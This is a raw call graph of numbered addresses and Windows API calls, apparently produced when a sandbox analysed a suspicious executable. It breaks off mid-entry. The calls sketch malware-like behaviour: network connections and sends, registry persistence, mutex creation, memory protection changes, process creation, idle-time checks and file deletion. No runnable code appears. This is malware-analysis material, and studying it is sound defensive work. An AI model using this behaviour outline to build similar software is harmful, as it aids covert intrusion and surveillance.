calls 2 library calls 51360->51380 51379 445354 20 API calls __dosmaperr 51361->51379 51367 44b9be 51362->51367 51366 44e8df ___scrt_fastfail 51368 44b9d6 51367->51368 51369 44b9cb 51367->51369 51371 44b9de 51368->51371 51377 44b9e7 _strftime 51368->51377 51381 446aff 21 API calls 3 library calls 51369->51381 51382 446ac5 51371->51382 51373 44ba11 RtlReAllocateHeap 51375 44b9d3 51373->51375 51373->51377 51374 44b9ec 51388 445354 20 API calls __dosmaperr 51374->51388 51375->51366 51377->51373 51377->51374 51389 442200 7 API calls 2 library calls 51377->51389 51379->51366 51380->51362 51381->51375 51383 446ad0 RtlFreeHeap 51382->51383 51384 446af9 _free 51382->51384 51383->51384 51385 446ae5 51383->51385 51384->51375 51390 445354 20 API calls __dosmaperr 51385->51390 51387 446aeb GetLastError 51387->51384 51388->51375 51389->51377 51390->51387 51391 426091 51396 42610e send 51391->51396 51397 425e56 51398 425e6b 51397->51398 51408 425f0b 51397->51408 51399 425f25 51398->51399 51400 425f5a 51398->51400 51401 425eb9 51398->51401 51402 425f77 51398->51402 51403 425f9e 51398->51403 51398->51408 51411 425eee 51398->51411 51425 424354 50 API calls ctype 51398->51425 51399->51400 51399->51408 51428 41f075 54 API calls 51399->51428 51400->51402 51429 424b7b 21 API calls 51400->51429 51401->51408 51401->51411 51426 41f075 54 API calls 51401->51426 51402->51403 51402->51408 51413 424f78 51402->51413 51403->51408 51430 4255c7 28 API calls 51403->51430 51411->51399 51411->51408 51427 424354 50 API calls ctype 51411->51427 51414 424f97 ___scrt_fastfail 51413->51414 51417 424fa6 51414->51417 51421 424fcb 51414->51421 51431 41e097 21 API calls 51414->51431 51415 424fab 51420 424fb4 51415->51420 51415->51421 51433 41cf6e 50 API calls 51415->51433 51417->51415 51417->51421 51432 41fad4 47 API calls 51417->51432 51420->51421 51434 424185 21 API calls 2 library calls 51420->51434 51421->51403 51423 42504e 51423->51421 51424 431f99 21 API calls 51423->51424 51424->51415 51425->51401 51426->51401 51427->51399 51428->51399 51429->51402 51430->51408 51431->51417 51432->51423 51433->51420 51434->51421 51435 1000c7a7 51436 1000c7be 51435->51436 51445 1000c82c 51435->51445 51436->51445 51447 1000c7e6 GetModuleHandleA 51436->51447 51437 1000c872 51438 1000c835 GetModuleHandleA 51440 1000c83f 51438->51440 51440->51440 51442 1000c85f GetProcAddress 51440->51442 51440->51445 51441 1000c7dd 51441->51440 51443 1000c800 GetProcAddress 51441->51443 51441->51445 51442->51445 51444 1000c80d VirtualProtect 51443->51444 51443->51445 51444->51445 51446 1000c81c VirtualProtect 51444->51446 51445->51437 51445->51438 51445->51440 51446->51445 51448 1000c82c 51447->51448 51449 1000c7ef 51447->51449 51451 1000c872 51448->51451 51452 1000c835 GetModuleHandleA 51448->51452 51454 1000c83f 51448->51454 51459 1000c803 GetProcAddress 51449->51459 51452->51454 51453 1000c7f4 51453->51448 51455 1000c800 GetProcAddress 51453->51455 51454->51448 51454->51454 51458 1000c85f GetProcAddress 51454->51458 51455->51448 51456 1000c80d VirtualProtect 51455->51456 51456->51448 51457 1000c81c VirtualProtect 51456->51457 51457->51448 51458->51448 51460 1000c80d VirtualProtect 51459->51460 51461 1000c82c 51459->51461 51460->51461 51462 1000c81c VirtualProtect 51460->51462 51463 1000c872 51461->51463 51464 1000c835 GetModuleHandleA 51461->51464 51462->51461 51466 1000c83f 51464->51466 51465 1000c85f GetProcAddress 51465->51466 51466->51461 51466->51465 51467 43a998 51470 43a9a4 _swprintf __FrameHandler3::FrameUnwindToState 51467->51470 51468 43a9b2 51485 445354 20 API calls __dosmaperr 51468->51485 51470->51468 51473 43a9dc 51470->51473 51471 43a9b7 51486 43a827 26 API calls _Deallocate 51471->51486 51480 444acc EnterCriticalSection 51473->51480 51475 43a9e7 51481 43aa88 51475->51481 51479 43a9c2 __fread_nolock 51480->51475 51482 43aa96 51481->51482 51484 43a9f2 51482->51484 51488 448416 39 API calls 2 library calls 51482->51488 51487 43aa0f LeaveCriticalSection std::_Lockit::~_Lockit 51484->51487 51485->51471 51486->51479 51487->51479 51488->51482 51489 414dba 51504 41a51b 51489->51504 51491 414dc3 51514 401fbd 51491->51514 51496 4161f2 51537 401d8c 51496->51537 51499 4161fb 51500 401eea 26 API calls 51499->51500 51501 416207 51500->51501 51502 401eea 26 API calls 51501->51502 51503 416213 51502->51503 51505 41a529 51504->51505 51506 43a88c ___crtLCMapStringA 21 API calls 51505->51506 51507 41a533 InternetOpenW InternetOpenUrlW 51506->51507 51508 41a55c InternetReadFile 51507->51508 51512 41a57f 51508->51512 51510 41a5ac InternetCloseHandle InternetCloseHandle 51511 41a5be 51510->51511 51511->51491 51512->51508 51512->51510 51513 401eea 26 API calls 51512->51513 51543 401f86 51512->51543 51513->51512 51515 401fcc 51514->51515 51552 402501 51515->51552 51517 401fea 51518 404468 51517->51518 51519 40447b 51518->51519 51557 404be8 51519->51557 51521 404490 ctype 51522 404507 WaitForSingleObject 51521->51522 51524 4044e7 51521->51524 51523 40451d 51522->51523 51561 42051a 56 API calls 51523->51561 51525 4044f9 send 51524->51525 51526 404542 51525->51526 51529 401eea 26 API calls 51526->51529 51528 404530 SetEvent 51528->51526 51530 40454a 51529->51530 51531 401eea 26 API calls 51530->51531 51532 404552 51531->51532 51532->51496 51533 401eea 51532->51533 51535 4021b9 51533->51535 51534 4021e8 51534->51496 51535->51534 51567 40262e 51535->51567 51538 40200a 51537->51538 51542 40203a 51538->51542 51575 402654 51538->51575 51540 40202b 51578 4026ba 26 API calls _Deallocate 51540->51578 51542->51499 51544 401f8e 51543->51544 51547 402325 51544->51547 51546 401fa4 51546->51512 51548 40232f 51547->51548 51550 40233a 51548->51550 51551 40294a 28 API calls 51548->51551 51550->51546 51551->51550 51553 40250d 51552->51553 51555 40252b 51553->51555 51556 40261a 28 API calls 51553->51556 51555->51517 51556->51555 51558 404bf0 51557->51558 51562 404c0c 51558->51562 51560 404c06 51560->51521 51561->51528 51563 404c16 51562->51563 51565 404c21 51563->51565 51566 404d07 28 API calls 51563->51566 51565->51560 51566->51565 51570 402bee 51567->51570 51569 40263b 51569->51534 51571 402bfb 51570->51571 51573 402c08 std::_Fac_tidy_reg_t::~_Fac_tidy_reg_t 51570->51573 51574 4015d8 26 API calls 2 library calls 51571->51574 51573->51569 51574->51573 51579 402c1a 51575->51579 51578->51542 51582 403340 51579->51582 51584 403348 51582->51584 51583 402662 51583->51540 51584->51583 51586 4038c2 51584->51586 51589 4038cb 51586->51589 51590 401eea 26 API calls 51589->51590 51591 4038ca 51590->51591 51591->51584 51592 402bcc 51593 402bd7 51592->51593 51594 402bdf 51592->51594 51600 403315 51593->51600 51596 402beb 51594->51596 51609 4015d3 51594->51609 51601 4015d3 22 API calls 51600->51601 51602 40332a 51601->51602 51603 402bdd 51602->51603 51604 40333b 51602->51604 51619 43a7ac 26 API calls 4 library calls 51604->51619 51606 43a846 51620 43a854 11 API calls _Atexit 51606->51620 51608 43a853 51611 43360d 51609->51611 51610 43a88c ___crtLCMapStringA 21 API calls 51610->51611 51611->51610 51612 402be9 51611->51612 51615 43362e std::_Facet_Register 51611->51615 51621 442200 7 API calls 2 library calls 51611->51621 51614 433dec std::_Facet_Register 51623 437bd7 RaiseException 51614->51623 51615->51614 51622 437bd7 RaiseException 51615->51622 51618 433e09 51619->51606 51620->51608 51621->51611 51622->51614 51623->51618 51624 4339be 51625 4339ca __FrameHandler3::FrameUnwindToState 51624->51625 51656 4336b3 51625->51656 51627 433b24 51956 433b44 IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 51627->51956 51629 4339d1 51629->51627 51631 4339fb 51629->51631 51630 433b2b 51957 4426be 28 API calls _Atexit 51630->51957 51641 433a3a ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 51631->51641 51950 4434d1 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 51631->51950 51633 433b31 51958 442670 28 API calls _Atexit 51633->51958 51636 433a14 51638 433a1a 51636->51638 51951 443475 5 API calls __ehhandler$?_ScheduleContinuationTask@_Task_impl_base@details@Concurrency@@QAEXPAU_ContinuationTaskHandleBase@23@@Z 51636->51951 51637 433b39 51640 433a9b 51667 433c5e 51640->51667 51641->51640 51952 43edf4 38 API calls 4 library calls 51641->51952 51650 433abd 51650->51630 51651 433ac1 51650->51651 51652 433aca 51651->51652 51954 442661 28 API calls _Atexit 51651->51954 51955 433842 13 API calls 2 library calls 51652->51955 51655 433ad2 51655->51638 51657 4336bc 51656->51657 51959 433e0a IsProcessorFeaturePresent 51657->51959 51659 4336c8 51960 4379ee 10 API calls 3 library calls 51659->51960 51661 4336cd 51662 4336d1 51661->51662 51961 44335e 51661->51961 51662->51629 51665 4336e8 51665->51629 52029 436050 51667->52029 51670 433aa1 51671 443422 51670->51671 52031 44ddc9 51671->52031 51673 433aaa 51676 40d767 51673->51676 51675 44342b 51675->51673 52035 44e0d3 38 API calls 51675->52035 52037 41bce3 LoadLibraryA GetProcAddress 51676->52037 51678 40d783 GetModuleFileNameW 52042 40e168 51678->52042 51680 40d79f 51681 401fbd 28 API calls 51680->51681 51682 40d7ae 51681->51682 51683 401fbd 28 API calls 51682->51683 51684 40d7bd 51683->51684 52057 41afc3 51684->52057 51688 40d7cf 51689 401d8c 26 API calls 51688->51689 51690 40d7d8 51689->51690 51691 40d835 51690->51691 51692 40d7eb 51690->51692 52082 401d64 51691->52082 52326 40e986 90 API calls 51692->52326 51695 40d845 51698 401d64 28 API calls 51695->51698 51696 40d7fd 51697 401d64 28 API calls 51696->51697 51700 40d809 51697->51700 51699 40d864 51698->51699 52087 404cbf 51699->52087 52327 40e937 68 API calls 51700->52327 51702 40d873 52091 405ce6 51702->52091 51705 40d87f 52094 401eef 51705->52094 51706 40d824 52328 40e155 68 API calls 51706->52328 51709 40d88b 51710 401eea 26 API calls 51709->51710 51711 40d894 51710->51711 51713 401eea 26 API calls 51711->51713 51712 401eea 26 API calls 51714 40dc9f 51712->51714 51715 40d89d 51713->51715 51953 433c94 GetModuleHandleW 51714->51953 51716 401d64 28 API calls 51715->51716 51717 40d8a6 51716->51717 52098 401ebd 51717->52098 51719 40d8b1 51720 401d64 28 API calls 51719->51720 51721 40d8ca 51720->51721 51722 401d64 28 API calls 51721->51722 51724 40d8e5 51722->51724 51723 40d946 51725 401d64 28 API calls 51723->51725 51740 40e134 51723->51740 51724->51723 52329 4085b4 51724->52329 51731 40d95d 51725->51731 51727 40d912 51728 401eef 26 API calls 51727->51728 51729 40d91e 51728->51729 51732 401eea 26 API calls 51729->51732 51730 40d9a4 52102 40bed7 51730->52102 51731->51730 51737 4124b7 3 API calls 51731->51737 51734 40d927 51732->51734 52333 4124b7 RegOpenKeyExA 51734->52333 51735 40d9aa 51736 40d82d 51735->51736 52105 41a463 51735->52105 51736->51712 51742 40d988 51737->51742 52421 412902 30 API calls 51740->52421 51741 40d9c5 51743 40da18 51741->51743 52122 40697b 51741->52122 51742->51730 52336 412902 30 API calls 51742->52336 51746 401d64 28 API calls 51743->51746 51748 40da21 51746->51748 51757 40da32 51748->51757 51758 40da2d 51748->51758 51750 40e14a 52422 4112b5 64 API calls ___scrt_fastfail 51750->52422 51751 40d9e4 52337 40699d 30 API calls 51751->52337 51752 40d9ee 51756 401d64 28 API calls 51752->51756 51765 40d9f7 51756->51765 51762 401d64 28 API calls 51757->51762 52340 4069ba CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 51758->52340 51759 40d9e9 52338 4064d0 97 API calls 51759->52338 51763 40da3b 51762->51763 52126 41ae08 51763->52126 51765->51743 51768 40da13 51765->51768 51766 40da46 52130 401e18 51766->52130 52339 4064d0 97 API calls 51768->52339 51769 40da51 52134 401e13 51769->52134 51772 40da5a 51773 401d64 28 API calls 51772->51773 51774 40da63 51773->51774 51775 401d64 28 API calls 51774->51775 51776 40da7d 51775->51776 51777 401d64 28 API calls 51776->51777 51778 40da97 51777->51778 51779 401d64 28 API calls 51778->51779 51781 40dab0 51779->51781 51780 40db1d 51782 40db2c 51780->51782 51789 40dcaa ___scrt_fastfail 51780->51789 51781->51780 51783 401d64 28 API calls 51781->51783 51784 40db35 51782->51784 51812 40dbb1 ___scrt_fastfail 51782->51812 51787 40dac5 _wcslen 51783->51787 51785 401d64 28 API calls 51784->51785 51786 40db3e 51785->51786 51788 401d64 28 API calls 51786->51788 51787->51780 51790 401d64 28 API calls 51787->51790 51791 40db50 51788->51791 52400 41265d RegOpenKeyExA 51789->52400 51792 40dae0 51790->51792 51794 401d64 28 API calls 51791->51794 51796 401d64 28 API calls 51792->51796 51795 40db62 51794->51795 51799 401d64 28 API calls 51795->51799 51797 40daf5 51796->51797 52341 40c89e 51797->52341 51798 40dcef 51800 401d64 28 API calls 51798->51800 51801 40db8b 51799->51801 51802 40dd16 51800->51802 51807 401d64 28 API calls 51801->51807 52148 401f66 51802->52148 51805 401e18 26 API calls 51806 40db14 51805->51806 51809 401e13 26 API calls 51806->51809 51810 40db9c 51807->51810 51809->51780 52398 40bc67 46 API calls _wcslen 51810->52398 51811 40dd25 52152 4126d2 RegCreateKeyA 51811->52152 52138 4128a2 51812->52138 51817 40dc45 ctype 51821 401d64 28 API calls 51817->51821 51818 40dbac 51818->51812 51819 401d64 28 API calls 51820 40dd47 51819->51820 52158 43a5e7 51820->52158 51822 40dc5c 51821->51822 51822->51798 51826 40dc70 51822->51826 51825 40dd5e 52403 41beb0 87 API calls ___scrt_fastfail 51825->52403 51828 401d64 28 API calls 51826->51828 51827 40dd81 51833 401f66 28 API calls 51827->51833 51830 40dc7e 51828->51830 51831 41ae08 28 API calls 51830->51831 51835 40dc87 51831->51835 51832 40dd65 CreateThread 51832->51827 53447 41c96f 10 API calls 51832->53447 51834 40dd96 51833->51834 51836 401f66 28 API calls 51834->51836 52399 40e219 119 API calls 51835->52399 51838 40dda5 51836->51838 52162 41a686 51838->52162 51839 40dc8c 51839->51798 51841 40dc93 51839->51841 51841->51736 51843 401d64 28 API calls 51844 40ddb6 51843->51844 51845 401d64 28 API calls 51844->51845 51846 40ddcb 51845->51846 51847 401d64 28 API calls 51846->51847 51848 40ddeb 51847->51848 51849 43a5e7 42 API calls 51848->51849 51850 40ddf8 51849->51850 51851 401d64 28 API calls 51850->51851 51852 40de03 51851->51852 51853 401d64 28 API calls 51852->51853 51854 40de14 51853->51854 51855 401d64 28 API calls 51854->51855 51856 40de29 51855->51856 51857 401d64 28 API calls 51856->51857 51858 40de3a 51857->51858 51859 40de41 StrToIntA 51858->51859 52186 409517 51859->52186 51862 401d64 28 API calls 51863 40de5c 51862->51863 51864 40dea1 51863->51864 51865 40de68 51863->51865 51867 401d64 28 API calls 51864->51867 52404 43360d 22 API calls 3 library calls 51865->52404 51869 40deb1 51867->51869 51868 40de71 51870 401d64 28 API calls 51868->51870 51872 40def9 51869->51872 51873 40debd 51869->51873 51871 40de84 51870->51871 51874 40de8b CreateThread 51871->51874 51876 401d64 28 API calls 51872->51876 52405 43360d 22 API calls 3 library calls 51873->52405 51874->51864 53444 419128 112 API calls __EH_prolog 51874->53444 51878 40df02 51876->51878 51877 40dec6 51879 401d64 28 API calls 51877->51879 51881 40df6c 51878->51881 51882 40df0e 51878->51882 51880 40ded8 51879->51880 51885 40dedf CreateThread 51880->51885 51883 401d64 28 API calls 51881->51883 51884 401d64 28 API calls 51882->51884 51886 40df75 51883->51886 51887 40df1e 51884->51887 51885->51872 53449 419128 112 API calls __EH_prolog 51885->53449 51888 40df81 51886->51888 51889 40dfba 51886->51889 51890 401d64 28 API calls 51887->51890 51892 401d64 28 API calls 51888->51892 52211 41a7a2 GetComputerNameExW GetUserNameW 51889->52211 51893 40df33 51890->51893 51895 40df8a 51892->51895 52406 40c854 51893->52406 51900 401d64 28 API calls 51895->51900 51896 401e18 26 API calls 51897 40dfce 51896->51897 51899 401e13 26 API calls 51897->51899 51902 40dfd7 51899->51902 51903 40df9f 51900->51903 51905 40dfe0 SetProcessDEPPolicy 51902->51905 51906 40dfe3 CreateThread 51902->51906 51914 43a5e7 42 API calls 51903->51914 51904 401e18 26 API calls 51907 40df52 51904->51907 51905->51906 51908 40e004 51906->51908 51909 40dff8 CreateThread 51906->51909 53417 40e54f 51906->53417 51910 401e13 26 API calls 51907->51910 51912 40e019 51908->51912 51913 40e00d CreateThread 51908->51913 51909->51908 53445 410f36 145 API calls 51909->53445 51911 40df5b CreateThread 51910->51911 51911->51881 53446 40196b 49 API calls 51911->53446 51916 40e073 51912->51916 51918 401f66 28 API calls 51912->51918 51913->51912 53448 411524 38 API calls ___scrt_fastfail 51913->53448 51915 40dfac 51914->51915 52417 40b95c 7 API calls 51915->52417 52222 41246e RegOpenKeyExA 51916->52222 51919 40e046 51918->51919 52418 404c9e 28 API calls 51919->52418 51923 40e053 51925 401f66 28 API calls 51923->51925 51924 40e12a 52234 40cbac 51924->52234 51927 40e062 51925->51927 51926 41ae08 28 API calls 51929 40e0a4 51926->51929 51930 41a686 79 API calls 51927->51930 52225 412584 RegOpenKeyExW 51929->52225 51932 40e067 51930->51932 51934 401eea 26 API calls 51932->51934 51934->51916 51937 401e13 26 API calls 51938 40e0c5 51937->51938 51939 40e0ed DeleteFileW 51938->51939 51940 40e0f4 51938->51940 51942 40e0db Sleep 51938->51942 51939->51938 51939->51940 51941 41ae08 28 API calls 51940->51941 51943 40e104 51941->51943 52419 401e07 51942->52419 52230 41297a RegOpenKeyExW 51943->52230 51946 40e117 51947 401e13 26 API calls 51946->51947 51948 40e121 51947->51948 51949 401e13 26 API calls 51948->51949 51949->51924 51950->51636 51951->51641 51952->51640 51953->51650 51954->51652 51955->51655 51956->51630 51957->51633 51958->51637 51959->51659 51960->51661 51965 44e949 51961->51965 51964 437a17 8 API calls 3 library calls 51964->51662 51966 44e966 51965->51966 51969 44e962 51965->51969 51966->51969 51971 4489ad 51966->51971 51968 4336da 51968->51665 51968->51964 51983 433d2c 51969->51983 51972 4489b9 __FrameHandler3::FrameUnwindToState 51971->51972 51990 444acc EnterCriticalSection 51972->51990 51974 4489c0 51991 44ef64 51974->51991 51976 4489cf 51977 4489de 51976->51977 52004 448841 29 API calls 51976->52004 52006 4489fa LeaveCriticalSection std::_Lockit::~_Lockit 51977->52006 51980 4489d9 52005 4488f7 GetStdHandle GetFileType 51980->52005 51981 4489ef __fread_nolock 51981->51966 51984 433d37 IsProcessorFeaturePresent 51983->51984 51985 433d35 51983->51985 51987 4341a4 51984->51987 51985->51968 52028 434168 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 51987->52028 51989 434287 51989->51968 51990->51974 51992 44ef70 __FrameHandler3::FrameUnwindToState 51991->51992 51993 44ef94 51992->51993 51994 44ef7d 51992->51994 52007 444acc EnterCriticalSection 51993->52007 52015 445354 20 API calls __dosmaperr 51994->52015 51997 44efa0 52003 44efcc 51997->52003 52008 44eeb5 51997->52008 51998 44ef82 52016 43a827 26 API calls _Deallocate 51998->52016 52001 44ef8c __fread_nolock 52001->51976 52017 44eff3 LeaveCriticalSection std::_Lockit::~_Lockit 52003->52017 52004->51980 52005->51977 52006->51981 52007->51997 52018 448706 52008->52018 52010 44eed4 52012 446ac5 _free 20 API calls 52010->52012 52011 44eec7 52011->52010 52025 44772e 11 API calls 2 library calls 52011->52025 52014 44ef26 52012->52014 52014->51997 52015->51998 52016->52001 52017->52001 52024 448713 _strftime 52018->52024 52019 448753 52027 445354 20 API calls __dosmaperr 52019->52027 52020 44873e RtlAllocateHeap 52022 448751 52020->52022 52020->52024 52022->52011 52024->52019 52024->52020 52026 442200 7 API calls 2 library calls 52024->52026 52025->52011 52026->52024 52027->52022 52028->51989 52030 433c71 GetStartupInfoW 52029->52030 52030->51670 52032 44dddb 52031->52032 52033 44ddd2 52031->52033 52032->51675 52036 44dcc8 51 API calls 3 library calls 52033->52036 52035->51675 52036->52032 52038 41bd22 LoadLibraryA GetProcAddress 52037->52038 52039 41bd12 GetModuleHandleA GetProcAddress 52037->52039 52040 41bd4b 32 API calls 52038->52040 52041 41bd3b LoadLibraryA GetProcAddress 52038->52041 52039->52038 52040->51678 52041->52040 52423 41a63f FindResourceA 52042->52423 52045 43a88c ___crtLCMapStringA 21 API calls 52046 40e192 ctype 52045->52046 52047 401f86 28 API calls 52046->52047 52048 40e1ad 52047->52048 52049 401eef 26 API calls 52048->52049 52050 40e1b8 52049->52050 52051 401eea 26 API calls 52050->52051 52052 40e1c1 52051->52052 52053 43a88c ___crtLCMapStringA 21 API calls 52052->52053 52054 40e1d2 ctype 52053->52054 52426 406052 52054->52426 52056 40e205 52056->51680 52077 41afd6 52057->52077 52058 41b046 52059 401eea 26 API calls 52058->52059 52060 41b078 52059->52060 52061 401eea 26 API calls 52060->52061 52063 41b080 52061->52063 52062 41b048 52064 403b60 28 API calls 52062->52064 52066 401eea 26 API calls 52063->52066 52067 41b054 52064->52067 52069 40d7c6 52066->52069 52070 401eef 26 API calls 52067->52070 52068 401eef 26 API calls 52068->52077 52078 40e8bd 52069->52078 52071 41b05d 52070->52071 52072 401eea 26 API calls 52071->52072 52074 41b065 52072->52074 52073 401eea 26 API calls 52073->52077 52433 41bfa9 28 API calls 52074->52433 52077->52058 52077->52062 52077->52068 52077->52073 52429 403b60 52077->52429 52432 41bfa9 28 API calls 52077->52432 52079 40e8ca 52078->52079 52081 40e8da 52079->52081 52450 40200a 26 API calls 52079->52450 52081->51688 52083 401d6c 52082->52083 52084 401d74 52083->52084 52451 401fff 28 API calls 52083->52451 52084->51695 52088 404ccb 52087->52088 52452 402e78 52088->52452 52090 404cee 52090->51702 52461 404bc4 52091->52461 52093 405cf4 52093->51705 52095 401efe 52094->52095 52096 401f0a 52095->52096 52470 4021b9 52095->52470 52096->51709 52100 401ec9 52098->52100 52099 401ee4 52099->51719 52100->52099 52101 402325 28 API calls 52100->52101 52101->52099 52474 401e8f 52102->52474 52104 40bee1 CreateMutexA GetLastError 52104->51735 52476 41b15b 52105->52476 52107 41a471 52480 412513 RegOpenKeyExA 52107->52480 52110 401eef 26 API calls 52111 41a49f 52110->52111 52112 401eea 26 API calls 52111->52112 52113 41a4a7 52112->52113 52114 41a4fa 52113->52114 52115 412513 31 API calls 52113->52115 52114->51741 52116 41a4cd 52115->52116 52117 41a4d8 StrToIntA 52116->52117 52118 41a4ef 52117->52118 52119 41a4e6 52117->52119 52121 401eea 26 API calls 52118->52121 52485 41c102 28 API calls 52119->52485 52121->52114 52123 40698f 52122->52123 52124 4124b7 3 API calls 52123->52124 52125 406996 52124->52125 52125->51751 52125->51752 52127 41ae1c 52126->52127 52486 40b027 52127->52486 52129 41ae24 52129->51766 52131 401e27 52130->52131 52133 401e33 52131->52133 52495 402121 26 API calls 52131->52495 52133->51769 52136 402121 52134->52136 52135 402150 52135->51772 52136->52135 52496 402718 26 API calls _Deallocate 52136->52496 52139 4128c0 52138->52139 52140 406052 28 API calls 52139->52140 52141 4128d5 52140->52141 52142 401fbd 28 API calls 52141->52142 52143 4128e5 52142->52143 52144 4126d2 29 API calls 52143->52144 52145 4128ef 52144->52145 52146 401eea 26 API calls 52145->52146 52147 4128fc 52146->52147 52147->51817 52149 401f6e 52148->52149 52497 402301 52149->52497 52153 412722 52152->52153 52154 4126eb 52152->52154 52155 401eea 26 API calls 52153->52155 52157 4126fd RegSetValueExA RegCloseKey 52154->52157 52156 40dd3b 52155->52156 52156->51819 52157->52153 52159 43a600 _swprintf 52158->52159 52501 43993e 52159->52501 52163 41a737 52162->52163 52164 41a69c GetLocalTime 52162->52164 52166 401eea 26 API calls 52163->52166 52165 404cbf 28 API calls 52164->52165 52167 41a6de 52165->52167 52168 41a73f 52166->52168 52169 405ce6 28 API calls 52167->52169 52170 401eea 26 API calls 52168->52170 52171 41a6ea 52169->52171 52172 40ddaa 52170->52172 52535 4027cb 52171->52535 52172->51843 52174 41a6f6 52175 405ce6 28 API calls 52174->52175 52176 41a702 52175->52176 52538 406478 76 API calls 52176->52538 52178 41a710 52179 401eea 26 API calls 52178->52179 52180 41a71c 52179->52180 52181 401eea 26 API calls 52180->52181 52182 41a725 52181->52182 52183 401eea 26 API calls 52182->52183 52184 41a72e 52183->52184 52185 401eea 26 API calls 52184->52185 52185->52163 52187 409536 _wcslen 52186->52187 52188 409541 52187->52188 52189 409558 52187->52189 52191 40c89e 32 API calls 52188->52191 52190 40c89e 32 API calls 52189->52190 52192 409560 52190->52192 52193 409549 52191->52193 52194 401e18 26 API calls 52192->52194 52195 401e18 26 API calls 52193->52195 52196 40956e 52194->52196 52197 409553 52195->52197 52198 401e13 26 API calls 52196->52198 52199 401e13 26 API calls 52197->52199 52200 409576 52198->52200 52201 4095ad 52199->52201 52558 40856b 28 API calls 52200->52558 52543 409837 52201->52543 52204 409588 52559 4028cf 52204->52559 52207 409593 52208 401e18 26 API calls 52207->52208 52209 40959d 52208->52209 52210 401e13 26 API calls 52209->52210 52210->52197 52750 403b40 52211->52750 52215 41a7fd 52216 4028cf 28 API calls 52215->52216 52217 41a807 52216->52217 52218 401e13 26 API calls 52217->52218 52219 41a810 52218->52219 52220 401e13 26 API calls 52219->52220 52221 40dfc3 52220->52221 52221->51896 52223 40e08b 52222->52223 52224 41248f RegQueryValueExA RegCloseKey 52222->52224 52223->51924 52223->51926 52224->52223 52226 4125b0 RegQueryValueExW RegCloseKey 52225->52226 52227 4125dd 52225->52227 52226->52227 52228 403b40 28 API calls 52227->52228 52229 40e0ba 52228->52229 52229->51937 52231 412992 RegDeleteValueW 52230->52231 52232 4129a6 52230->52232 52231->52232 52233 4129a2 52231->52233 52232->51946 52233->51946 52235 40cbc5 52234->52235 52236 41246e 3 API calls 52235->52236 52237 40cbcc 52236->52237 52241 40cbeb 52237->52241 52772 401602 52237->52772 52239 40cbd9 52775 4127d5 RegCreateKeyA 52239->52775 52242 413fd4 52241->52242 52243 413feb 52242->52243 52792 41aa73 52243->52792 52245 413ff6 52246 401d64 28 API calls 52245->52246 52247 41400f 52246->52247 52248 43a5e7 42 API calls 52247->52248 52249 41401c 52248->52249 52250 414021 Sleep 52249->52250 52251 41402e 52249->52251 52250->52251 52252 401f66 28 API calls 52251->52252 52253 41403d 52252->52253 52254 401d64 28 API calls 52253->52254 52255 41404b 52254->52255 52256 401fbd 28 API calls 52255->52256 52257 414053 52256->52257 52258 41afc3 28 API calls 52257->52258 52259 41405b 52258->52259 52796 404262 WSAStartup 52259->52796 52261 414065 52262 401d64 28 API calls 52261->52262 52263 41406e 52262->52263 52264 401d64 28 API calls 52263->52264 52288 4140ed 52263->52288 52265 414087 52264->52265 52268 401d64 28 API calls 52265->52268 52266 401d64 28 API calls 52266->52288 52267 401fbd 28 API calls 52267->52288 52269 414098 52268->52269 52271 401d64 28 API calls 52269->52271 52270 41afc3 28 API calls 52270->52288 52272 4140a9 52271->52272 52274 401d64 28 API calls 52272->52274 52273 4085b4 28 API calls 52273->52288 52275 4140ba 52274->52275 52277 401d64 28 API calls 52275->52277 52276 401eef 26 API calls 52276->52288 52278 4140cb 52277->52278 52279 401d64 28 API calls 52278->52279 52280 4140dd 52279->52280 52908 404101 87 API calls 52280->52908 52283 414244 WSAGetLastError 52909 41bc76 30 API calls 52283->52909 52288->52266 52288->52267 52288->52270 52288->52273 52288->52276 52288->52283 52290 41a686 79 API calls 52288->52290 52292 404cbf 28 API calls 52288->52292 52294 401d8c 26 API calls 52288->52294 52295 414ae4 52288->52295 52297 405ce6 28 API calls 52288->52297 52299 401f66 28 API calls 52288->52299 52302 4082dc 28 API calls 52288->52302 52303 440c51 26 API calls 52288->52303 52304 41265d 3 API calls 52288->52304 52305 412513 31 API calls 52288->52305 52306 403b40 28 API calls 52288->52306 52309 401d64 28 API calls 52288->52309 52313 41ad46 28 API calls 52288->52313 52316 41aec8 28 API calls 52288->52316 52318 4027cb 28 API calls 52288->52318 52319 40275c 28 API calls 52288->52319 52320 404468 60 API calls 52288->52320 52321 401eea 26 API calls 52288->52321 52322 401e13 26 API calls 52288->52322 52325 414b22 CreateThread 52288->52325 52797 413f9a 52288->52797 52802 4041f1 52288->52802 52809 404915 52288->52809 52824 40428c connect 52288->52824 52884 41a96d 52288->52884 52887 413683 52288->52887 52890 40cbf1 52288->52890 52896 41adee 52288->52896 52899 41aca0 GetLastInputInfo GetTickCount 52288->52899 52900 41ac52 52288->52900 52905 40e679 GetLocaleInfoA 52288->52905 52910 404c9e 28 API calls 52288->52910 52911 4027ec 52288->52911 52915 4045d5 52288->52915 52931 4047eb WaitForSingleObject 52288->52931 52290->52288 52292->52288 52293 401d64 28 API calls 52293->52295 52294->52288 52295->52293 52296 43a5e7 42 API calls 52295->52296 52930 40a767 84 API calls 52295->52930 52298 414b80 Sleep 52296->52298 52297->52288 52298->52288 52299->52288 52302->52288 52303->52288 52304->52288 52305->52288 52306->52288 52310 4144ed GetTickCount 52309->52310 52311 41ad46 28 API calls 52310->52311 52311->52288 52313->52288 52316->52288 52318->52288 52319->52288 52320->52288 52321->52288 52322->52288 52325->52288 53399 419e89 104 API calls 52325->53399 52326->51696 52327->51706 52330 4085c0 52329->52330 52331 402e78 28 API calls 52330->52331 52332 4085e4 52331->52332 52332->51727 52334 4124e1 RegQueryValueExA RegCloseKey 52333->52334 52335 41250b 52333->52335 52334->52335 52335->51723 52336->51730 52337->51759 52338->51752 52339->51743 52340->51757 52342 40c8ba 52341->52342 52343 40c8da 52342->52343 52344 40c90f 52342->52344 52348 40c8d0 52342->52348 53411 41a74b 29 API calls 52343->53411 52347 41b15b 2 API calls 52344->52347 52346 40ca03 GetLongPathNameW 52350 403b40 28 API calls 52346->52350 52351 40c914 